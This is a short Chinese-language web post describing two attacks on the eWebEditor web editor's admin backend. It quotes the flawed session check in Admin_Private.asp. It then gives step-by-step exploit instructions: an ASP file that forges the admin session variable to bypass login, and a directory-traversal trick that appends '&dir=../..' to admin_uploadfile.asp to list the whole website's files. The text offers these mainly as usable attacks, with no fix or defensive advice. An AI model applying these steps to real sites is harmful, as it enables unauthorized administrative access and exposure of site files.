eWebEditor session欺骗漏洞


漏洞文件:Admin_Private.asp 
漏洞语句:

if Session("eWebEditor_User") = "" Then 
Response.Redirect "admin_login.asp" 
Response.End 
End If

只判断了session，没有判断cookies和路径的验证问题。 
漏洞利用: 
新建一个h4x0r.asp内容如下: 
<%Session("eWebEditor_User") = "admini"%> 
访问h4x0r.asp，再访问后台任何文件，for example:Admin_Default.asp

在webeditor后台有个小小的缺陷. 可以历遍整个网站目录.当然.数据库为只读的时候一样可以利用.
(好象不能用了)
for:
上传文件管理---选择样式目录(随便选一个目录) 
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了 


上一篇：利用eWebEditor获得WebShell
下一篇：鼠标放上去进行图片切换